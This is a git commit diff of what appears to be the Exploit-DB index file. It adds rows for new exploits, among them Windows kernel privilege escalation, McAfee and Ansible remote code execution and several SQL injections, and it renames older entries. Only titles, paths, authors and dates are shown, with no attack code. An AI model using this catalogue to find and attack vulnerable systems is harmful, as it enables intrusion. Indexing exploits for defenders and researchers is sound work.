DB: 2017-01-12

16 new exploits VMware 2.5.1 - (VMware-authd) Remote Denial of Service VMware 2.5.1 - 'VMware-authd' Remote Denial of Service Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (2) Boxoft Wav 1.0 - Buffer Overflow VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow EleCard MPEG PLAYER - '.m3u' Local Stack Overflow Elecard MPEG Player - '.m3u' Local Stack Overflow Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1) Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow Boxoft WAV to MP3 Converter - 'convert' Buffer Overflow Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2) Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout) Firejail - Privilege Escalation McAfee Virus Scan Enterprise for Linux - Remote Code Execution McAfee Virus Scan Enterprise for Linux 1.9.2 < 2.0.2 - Remote Code Execution Ansible 2.1.4 / 2.2.1 - Command Execution Eggblog < 3.07 - Remote SQL Injection / Privilege Escalation EggBlog < 3.07 - Remote SQL Injection / Privilege Escalation PowerClan 1.14a - (footer.inc.php) Remote File Inclusion PowerClan 1.14a - 'footer.inc.php' Remote File Inclusion Eggblog 3.1.0 - Cookies SQL Injection EggBlog 3.1.0 - Cookies SQL Injection eggBlog 4.0 - SQL Injection EggBlog 4.0 - SQL Injection 2Capsule - 'sticker.php id' SQL Injection 2Capsule - SQL Injection ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection ASPThai.Net WebBoard 6.0 - SQL Injection Memberkit 1.0 - Remote Arbitrary .PHP File Upload phpScribe 0.9 - (user.cfg) Remote Config Disclosure Memberkit 1.0 - Arbitrary File Upload phpScribe 0.9 - 'user.cfg' Remote Config Disclosure PowerClan 1.14a - (Authentication Bypass) SQL Injection PowerClan 1.14a - Authentication Bypass Webspell 4 - (Authentication Bypass) SQL Injection webSPELL 4 - Authentication Bypass eggBlog 4.1.1 - Local Directory Traversal EggBlog 4.1.1 - Local Directory Traversal Travel Portal Script Admin Password Change - Cross-Site Request Forgery Travel Portal Script - Cross-Site Request Forgery (Admin Password Change) eggBlog 4.1.2 - Arbitrary File Upload EggBlog 4.1.2 - Arbitrary File Upload Eggblog 2.0 - blog.php id Parameter SQL Injection Eggblog 2.0 - topic.php message Parameter Cross-Site Scripting EggBlog 2.0 - 'id' Parameter SQL Injection EggBlog 2.0 - 'message' Parameter Cross-Site Scripting PowerClan 1.14 - member.php SQL Injection PowerClan 1.14 - 'member.php' SQL Injection SoftBizScripts Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection SoftBizScripts Dating Script 1.0 - products.php cid Parameter SQL Injection SoftBizScripts Dating Script 1.0 - 'index.php' cid Parameter SQL Injection SoftBizScripts Dating Script 1.0 - news_desc.php id Parameter SQL Injection SoftBizScripts Dating Script 1.0 - 'featured_photos.php' SQL Injection SoftBizScripts Dating Script 1.0 - 'products.php' SQL Injection SoftBizScripts Dating Script 1.0 - 'index.php' SQL Injection SoftBizScripts Dating Script 1.0 - 'news_desc.php' SQL Injection Dating Script 3.25 - SQL Injection Starting Page 1.3 - SQL Injection Starting Page 1.3 - 'linkid' Parameter SQL Injection Starting Page 1.3 - 'category' Parameter SQL Injection My link trader 1.1 - 'id' Parameter SQL Injection Blackboard LMS 9.1 SP14 - Cross-Site Scripting Huawei Flybox B660 - Cross-Site Request Forgery Travel Portal Script 9.33 - SQL Injection Movie Portal Script 7.35 - SQL Injection
2017-01-12 05:01:16 +00:00 · 2017-01-12 05:01:16 +00:00 · 3617e005f6
commit 3617e005f6
parent 1b13c8a790
20 changed files with 2675 additions and 30 deletions
--- a/files.csv
+++ b/files.csv
@ -892,7 +892,7 @@ id,file,description,date,author,platform,type,port
 7634,platforms/windows/dos/7634.pl,"Audacity 1.2.6 - '.gro' Local Buffer Overflow (PoC)",2009-01-01,Houssamix,windows,dos,0
 7637,platforms/windows/dos/7637.pl,"Elecard MPEG Player 5.5 - '.m3u' Stack Buffer Overflow (PoC)",2009-01-01,"aBo MoHaMeD",windows,dos,0
 7643,platforms/multiple/dos/7643.txt,"Konqueror 4.1 - Cross-Site Scripting / Remote Crash",2009-01-01,StAkeR,multiple,dos,0
-7647,platforms/multiple/dos/7647.txt,"VMware 2.5.1 - (VMware-authd) Remote Denial of Service",2009-01-02,"laurent gaffiÃ©",multiple,dos,0
+7647,platforms/multiple/dos/7647.txt,"VMware 2.5.1 - 'VMware-authd' Remote Denial of Service",2009-01-02,"laurent gaffiÃ©",multiple,dos,0
 7649,platforms/windows/dos/7649.pl,"Destiny Media Player 1.61 - '.m3u' Local Buffer Overflow (PoC)",2009-01-02,"aBo MoHaMeD",windows,dos,0
 7652,platforms/windows/dos/7652.pl,"Destiny Media Player 1.61 - '.lst' Local Buffer Overflow (PoC)",2009-01-03,Encrypt3d.M!nd,windows,dos,0
 7673,platforms/multiple/dos/7673.html,"Apple Safari - 'ARGUMENTS' Array Integer Overflow PoC (New Heap Spray)",2009-01-05,Skylined,multiple,dos,0
@ -5335,6 +5335,10 @@ id,file,description,date,author,platform,type,port
 40985,platforms/linux/dos/40985.txt,"QNAP NAS Devices - Heap Overflow",2017-01-02,bashis,linux,dos,0
 40994,platforms/multiple/dos/40994.html,"Brave Browser 1.2.16/1.9.56 - Address Bar URL Spoofing",2017-01-08,"Aaditya Purani",multiple,dos,0
 40996,platforms/php/dos/40996.txt,"DirectAdmin 1.50.1 - Denial of Service",2017-01-08,"IeDb ir",php,dos,0
 41008,platforms/multiple/dos/41008.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption",2017-01-11,COSIG,multiple,dos,0
 41012,platforms/multiple/dos/41012.txt,"Adobe Flash Player 24.0.0.186 - 'ActionGetURL2' Out-of-Bounds Memory Corruption (2)",2017-01-11,COSIG,multiple,dos,0
 41018,platforms/windows/dos/41018.txt,"Boxoft Wav 1.0 - Buffer Overflow",2017-01-11,Vulnerability-Lab,windows,dos,0
 41025,platforms/windows/dos/41025.txt,"VideoLAN VLC Media Player 2.2.1 - 'DecodeAdpcmImaQT' Buffer Overflow",2016-05-27,"Patrick Coleman",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -5976,7 +5980,7 @@ id,file,description,date,author,platform,type,port
 7839,platforms/windows/local/7839.py,"Total Video Player 1.31 - (DefaultSkin.ini) Local Stack Overflow",2009-01-20,His0k4,windows,local,0
 7843,platforms/windows/local/7843.c,"Browser3D 3.5 - '.sfs' Local Stack Overflow (C)",2009-01-22,SimO-s0fT,windows,local,0
 7848,platforms/windows/local/7848.pl,"Browser3D 3.5 - '.sfs' Local Stack Overflow (Perl)",2009-01-22,AlpHaNiX,windows,local,0
-7853,platforms/windows/local/7853.pl,"EleCard MPEG PLAYER - '.m3u' Local Stack Overflow",2009-01-25,AlpHaNiX,windows,local,0
+7853,platforms/windows/local/7853.pl,"Elecard MPEG Player - '.m3u' Local Stack Overflow",2009-01-25,AlpHaNiX,windows,local,0
 7855,platforms/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
 7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
 7888,platforms/windows/local/7888.pl,"Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (Universal)",2009-01-28,Houssamix,windows,local,0
@ -8220,7 +8224,7 @@ id,file,description,date,author,platform,type,port
 33360,platforms/windows/local/33360.c,"Avast! AntiVirus 4.8.1356 - 'aswRdr.sys' Driver Privilege Escalation",2009-11-16,Evilcry,windows,local,0
 33387,platforms/linux/local/33387.txt,"Nagios Plugins check_dhcp 2.0.1 - Arbitrary Option File Read",2014-05-16,"Dawid Golunski",linux,local,0
 33395,platforms/linux/local/33395.txt,"Linux Kernel 2.6.x - Ext4 'move extents' ioctl Privilege Escalation",2009-11-09,"Akira Fujita",linux,local,0
-40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135)",2016-11-24,IOactive,windows,local,0
+40823,platforms/windows/local/40823.txt,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (1)",2016-11-24,IOactive,windows,local,0
 33508,platforms/linux/local/33508.txt,"GNU Bash 4.0 - 'ls' Control Character Command Injection",2010-01-13,"Eric Piel",linux,local,0
 33516,platforms/linux/local/33516.c,"Linux Kernel 3.14-rc1 <= 3.15-rc4 (x64) - Raw Mode PTY Local Echo Race Condition Privilege Escalation",2014-05-26,"Matthew Daley",linux,local,0
 33572,platforms/unix/local/33572.txt,"IBM DB2 - 'REPEAT()' Heap Buffer Overflow",2010-01-27,"Evgeny Legerov",unix,local,0
@ -8436,7 +8440,7 @@ id,file,description,date,author,platform,type,port
 37975,platforms/linux/local/37975.py,"ZSNES 1.51 - Buffer Overflow",2015-08-26,"Juan Sacco",linux,local,0
 37987,platforms/linux/local/37987.py,"FENIX 0.92 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0
 37988,platforms/linux/local/37988.py,"BSIGN 0.4.5 - Buffer Overflow",2015-08-27,"Juan Sacco",linux,local,0
-38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0
+38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - 'convert' Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0
 38036,platforms/osx/local/38036.rb,"Apple Mac OSX Entitlements - 'Rootpipe' Privilege Escalation (Metasploit)",2015-08-31,Metasploit,osx,local,0
 38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0
 38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OSX Client 2.0 - Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0
@ -8744,6 +8748,10 @@ id,file,description,date,author,platform,type,port
 40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
 40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
 40995,platforms/windows/local/40995.txt,"Advanced Desktop Locker 6.0.0 - Lock Screen Bypass",2017-01-08,Squnity,windows,local,0
 41015,platforms/windows/local/41015.c,"Microsoft Windows Kernel - 'win32k.sys' 'NtSetWindowLongPtr' Privilege Escalation (MS16-135) (2)",2017-01-08,"Rick Larabee",windows,local,0
 41020,platforms/windows/local/41020.c,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098)",2017-01-03,Saif,windows,local,0
 41021,platforms/multiple/local/41021.txt,"Cemu 1.6.4b - Information Leak + Buffer Overflow (Emulator Breakout)",2017-01-09,Wack0,multiple,local,0
 41022,platforms/linux/local/41022.txt,"Firejail - Privilege Escalation",2017-01-09,"Daniel Hodson",linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15196,7 +15204,7 @@ id,file,description,date,author,platform,type,port
 40868,platforms/windows/remote/40868.py,"Dup Scout Enterprise 9.1.14 - Buffer Overflow (SEH)",2016-12-05,vportal,windows,remote,0
 40869,platforms/windows/remote/40869.py,"DiskBoss Enterprise 7.4.28 - 'GET' Buffer Overflow",2016-12-05,vportal,windows,remote,0
 40881,platforms/windows/remote/40881.html,"Microsoft Internet Explorer - jscript9 JavaScriptStackWalker Memory Corruption (MS15-056)",2016-12-06,Skylined,windows,remote,0
-40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0
+40911,platforms/linux/remote/40911.py,"McAfee Virus Scan Enterprise for Linux 1.9.2 < 2.0.2 - Remote Code Execution",2016-12-13,"Andrew Fasano",linux,remote,0
 40916,platforms/linux/remote/40916.txt,"APT - Repository Signing Bypass via Memory Allocation Failure",2016-12-14,"Google Security Research",linux,remote,0
 40920,platforms/linux/remote/40920.py,"Nagios < 4.2.2 - Arbitrary Code Execution",2016-12-15,"Dawid Golunski",linux,remote,0
 40930,platforms/osx/remote/40930.txt,"Horos 2.1.0 Web Portal - Directory Traversal",2016-12-16,LiquidWorm,osx,remote,0
@ -15205,6 +15213,7 @@ id,file,description,date,author,platform,type,port
 40984,platforms/windows/remote/40984.py,"Internet Download Accelerator 6.10.1.1527 - FTP Buffer Overflow (SEH)",2017-01-02,"Fady Mohammed Osman",windows,remote,0
 40990,platforms/windows/remote/40990.txt,"Microsoft Edge (Windows 10) - 'chakra.dll' Info Leak / Type Confusion Remote Code Execution",2017-01-05,"Brian Pak",windows,remote,0
 41003,platforms/windows/remote/41003.py,"DiskBoss Enterprise 7.5.12 - 'POST' Buffer Overflow (SEH)",2017-01-10,"Wyndell Bibera",windows,remote,0
 41013,platforms/linux/remote/41013.txt,"Ansible 2.1.4 / 2.2.1 - Command Execution",2017-01-09,Computest,linux,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16248,7 +16257,7 @@ id,file,description,date,author,platform,type,port
 1839,platforms/php/webapps/1839.txt,"tinyBB 0.3 - Remote File Inclusion / SQL Injection",2006-05-28,nukedx,php,webapps,0
 1840,platforms/asp/webapps/1840.txt,"Enigma Haber 4.3 - Multiple SQL Injections",2006-05-28,nukedx,asp,webapps,0
 1841,platforms/php/webapps/1841.txt,"F@cile Interactive Web 0.8x - Remote File Inclusion / Cross-Site Scripting",2006-05-28,nukedx,php,webapps,0
-1842,platforms/php/webapps/1842.htm,"Eggblog < 3.07 - Remote SQL Injection / Privilege Escalation",2006-05-28,nukedx,php,webapps,0
+1842,platforms/php/webapps/1842.htm,"EggBlog < 3.07 - Remote SQL Injection / Privilege Escalation",2006-05-28,nukedx,php,webapps,0
 1843,platforms/php/webapps/1843.txt,"UBB Threads 5.x / 6.x - Multiple Remote File Inclusion",2006-05-28,nukedx,php,webapps,0
 1844,platforms/php/webapps/1844.txt,"Activity MOD Plus 1.1.0 - (phpBB Mod) File Inclusion",2006-05-28,nukedx,php,webapps,0
 1845,platforms/asp/webapps/1845.txt,"ASPSitem 2.0 - SQL Injection / Database Disclosure",2006-05-28,nukedx,asp,webapps,0
@ -17076,7 +17085,7 @@ id,file,description,date,author,platform,type,port
 2969,platforms/php/webapps/2969.txt,"PHP/Mysql Site Builder 0.0.2 - (htm2PHP.php) File Disclosure",2006-12-21,"the master",php,webapps,0
 2970,platforms/php/webapps/2970.txt,"Newxooper-PHP 0.9.1 - (mapage.php) Remote File Inclusion",2006-12-21,3l3ctric-Cracker,php,webapps,0
 2971,platforms/php/webapps/2971.txt,"PgmReloaded 0.8.5 - Multiple Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0
-2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a - (footer.inc.php) Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0
+2973,platforms/php/webapps/2973.txt,"PowerClan 1.14a - 'footer.inc.php' Remote File Inclusion",2006-12-21,nuffsaid,php,webapps,0
 2975,platforms/php/webapps/2975.pl,"Ixprim CMS 1.2 - Blind SQL Injection",2006-12-21,DarkFig,php,webapps,0
 2976,platforms/php/webapps/2976.txt,"inertianews 0.02b - (inertianews_main.php) Remote File Inclusion",2006-12-21,bd0rk,php,webapps,0
 2977,platforms/php/webapps/2977.txt,"MKPortal M1.1.1 - 'Urlobox' Cross-Site Request Forgery",2006-12-21,Demential,php,webapps,0
@ -18257,7 +18266,7 @@ id,file,description,date,author,platform,type,port
 4857,platforms/php/webapps/4857.txt,"OneCMS 2.4 - SQL Injection / Upload",2008-01-07,BugReport.IR,php,webapps,0
 4858,platforms/php/webapps/4858.pl,"FlexBB 0.6.3 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0
 4859,platforms/php/webapps/4859.txt,"EkinBoard 1.1.0 - Arbitrary File Upload / Authentication Bypass",2008-01-07,"Eugene Minaev",php,webapps,0
-4860,platforms/php/webapps/4860.pl,"Eggblog 3.1.0 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0
+4860,platforms/php/webapps/4860.pl,"EggBlog 3.1.0 - Cookies SQL Injection",2008-01-07,"Eugene Minaev",php,webapps,0
 4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 - 'cmd.php' Remote Command Execution",2008-01-07,Houssamix,php,webapps,0
 4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 - Pass Recovery SQL Injection",2008-01-08,"Eugene Minaev",php,webapps,0
 4864,platforms/php/webapps/4864.txt,"ZeroCMS 1.0 Alpha - Arbitrary File Upload / SQL Injection",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
@ -18590,7 +18599,7 @@ id,file,description,date,author,platform,type,port
 5333,platforms/php/webapps/5333.txt,"EasyNews 40tr - SQL Injection / Cross-Site Scripting / Local File Inclusion",2008-04-01,"Khashayar Fereidani",php,webapps,0
 5334,platforms/php/webapps/5334.txt,"FaScript FaPhoto 1.0 - 'show.php' SQL Injection",2008-04-01,"Khashayar Fereidani",php,webapps,0
 5335,platforms/php/webapps/5335.txt,"Mambo Component Ahsshop 1.51 - 'vara' Parameter SQL Injection",2008-04-01,S@BUN,php,webapps,0
-5336,platforms/php/webapps/5336.pl,"eggBlog 4.0 - SQL Injection",2008-04-01,girex,php,webapps,0
+5336,platforms/php/webapps/5336.pl,"EggBlog 4.0 - SQL Injection",2008-04-01,girex,php,webapps,0
 5337,platforms/php/webapps/5337.txt,"Joomla! Component actualite 1.0 - 'id' Parameter SQL Injection",2008-04-01,Stack,php,webapps,0
 5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0
 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0
@ -20393,20 +20402,20 @@ id,file,description,date,author,platform,type,port
 7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0
 7628,platforms/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0
 7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0
-7631,platforms/php/webapps/7631.txt,"2Capsule - 'sticker.php id' SQL Injection",2009-01-01,Zenith,php,webapps,0
+7631,platforms/php/webapps/7631.txt,"2Capsule - SQL Injection",2009-01-01,Zenith,php,webapps,0
 7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Cross-Site Request Forgery (Change Admin Password)",2009-01-01,x0r,php,webapps,0
-7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0
+7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - SQL Injection",2009-01-01,DaiMon,php,webapps,0
 7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0
-7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote Arbitrary .PHP File Upload",2009-01-01,Lo$er,php,webapps,0
+7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Arbitrary File Upload",2009-01-01,Lo$er,php,webapps,0
-7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0
+7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - 'user.cfg' Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0
 7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - Authentication Bypass",2009-01-01,DNX,php,webapps,0
 7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - 'newsid' Parameter SQL Injection",2009-01-01,"Virangar Security",php,webapps,0
-7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a - (Authentication Bypass) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0
+7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a - Authentication Bypass",2009-01-01,"Virangar Security",php,webapps,0
 7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0
 7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0
 7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-01-02,ahmadbady,php,webapps,0
 7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection",2009-01-03,darkjoker,php,webapps,0
-7653,platforms/php/webapps/7653.txt,"Webspell 4 - (Authentication Bypass) SQL Injection",2009-01-03,anonymous,php,webapps,0
+7653,platforms/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,php,webapps,0
 7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0
 7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0
 7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps,0
@ -20972,7 +20981,7 @@ id,file,description,date,author,platform,type,port
 8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0
 8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0
 8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0
-8652,platforms/php/webapps/8652.pl,"eggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0
+8652,platforms/php/webapps/8652.pl,"EggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0
 8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / Arbitrary File Upload",2009-05-11,ahmadbady,php,webapps,0
 8654,platforms/php/webapps/8654.txt,"openWYSIWYG 1.4.7 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0
 8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0
@ -24069,7 +24078,7 @@ id,file,description,date,author,platform,type,port
 15254,platforms/php/webapps/15254.txt,"KCFinder 2.2 - Arbitrary File Upload",2010-10-15,saudi0hacker,php,webapps,0
 15270,platforms/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,asp,webapps,0
 15610,platforms/php/webapps/15610.txt,"Joomla! Component JE Ajax Event Calendar - SQL Injection",2010-11-25,ALTBTA,php,webapps,0
-15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - Cross-Site Request Forgery",2010-10-19,KnocKout,php,webapps,0
+15280,platforms/php/webapps/15280.html,"Travel Portal Script - Cross-Site Request Forgery (Admin Password Change)",2010-10-19,KnocKout,php,webapps,0
 15276,platforms/php/webapps/15276.txt,"411cc - Multiple SQL Injections",2010-10-18,KnocKout,php,webapps,0
 15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - 'FCKeditor' Arbitrary File Upload",2010-10-18,"Kubanezi AHG",php,webapps,0
 15278,platforms/php/webapps/15278.txt,"Brooky CubeCart 2.0.1 - SQL Injection",2010-10-18,X_AviaTique_X,php,webapps,0
@ -27297,7 +27306,7 @@ id,file,description,date,author,platform,type,port
 25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple Parameter SQL Injection",2005-02-17,"Patrick Hof",php,webapps,0
 25123,platforms/php/webapps/25123.txt,"TrackerCam 5.12 - ComGetLogFile.php3 fm Parameter Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps,0
 25125,platforms/php/webapps/25125.txt,"ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-02-19,"albanian haxorz",php,webapps,0
-25126,platforms/php/webapps/25126.txt,"eggBlog 4.1.2 - Arbitrary File Upload",2013-05-01,Pokk3rs,php,webapps,0
+25126,platforms/php/webapps/25126.txt,"EggBlog 4.1.2 - Arbitrary File Upload",2013-05-01,Pokk3rs,php,webapps,0
 25127,platforms/php/webapps/25127.txt,"PMachine Pro 2.4 - Remote File Inclusion",2005-02-19,kc,php,webapps,0
 25138,platforms/hardware/webapps/25138.txt,"D-Link IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0
 25139,platforms/hardware/webapps/25139.txt,"Vivotek IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0
@ -28798,8 +28807,8 @@ id,file,description,date,author,platform,type,port
 27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
 27107,platforms/php/webapps/27107.txt,"PHPXplorer 0.9.33 - action.php Directory Traversal",2006-01-16,liz0,php,webapps,0
 27109,platforms/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 - BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0
-27110,platforms/php/webapps/27110.txt,"Eggblog 2.0 - blog.php id Parameter SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0
+27110,platforms/php/webapps/27110.txt,"EggBlog 2.0 - 'id' Parameter SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0
-27111,platforms/php/webapps/27111.txt,"Eggblog 2.0 - topic.php message Parameter Cross-Site Scripting",2006-01-18,alex@evuln.com,php,webapps,0
+27111,platforms/php/webapps/27111.txt,"EggBlog 2.0 - 'message' Parameter Cross-Site Scripting",2006-01-18,alex@evuln.com,php,webapps,0
 27112,platforms/php/webapps/27112.txt,"SaralBlog 1.0 - Multiple Input Validation Vulnerabilities",2006-01-18,"Aliaksandr Hartsuyeu",php,webapps,0
 27114,platforms/php/webapps/27114.txt,"WebspotBlogging 3.0 - 'login.php' SQL Injection",2006-01-19,"Aliaksandr Hartsuyeu",php,webapps,0
 27115,platforms/cgi/webapps/27115.txt,"Rockliffe MailSite 5.3.4/6.1.22/7.0.3 - HTTP Mail Management Cross-Site Scripting",2006-01-20,"OS2A BTO",cgi,webapps,0
@ -29189,7 +29198,7 @@ id,file,description,date,author,platform,type,port
 27642,platforms/php/webapps/27642.txt,"AR-Blog 5.2 - print.php Cross-Site Scripting",2006-04-14,ALMOKANN3,php,webapps,0
 27643,platforms/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 - Language.php File Inclusion",2006-04-15,rgod,php,webapps,0
 27644,platforms/php/webapps/27644.txt,"PlanetSearch + - Planetsearchplus.php Cross-Site Scripting",2006-04-13,d4igoro,php,webapps,0
-27645,platforms/php/webapps/27645.txt,"PowerClan 1.14 - member.php SQL Injection",2006-04-13,d4igoro,php,webapps,0
+27645,platforms/php/webapps/27645.txt,"PowerClan 1.14 - 'member.php' SQL Injection",2006-04-13,d4igoro,php,webapps,0
 27646,platforms/php/webapps/27646.txt,"LifeType 1.0.3 - 'index.php' Cross-Site Scripting",2006-04-13,"Rusydi Hasan",php,webapps,0
 27647,platforms/php/webapps/27647.txt,"Papoo 2.1.x - print.php Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps,0
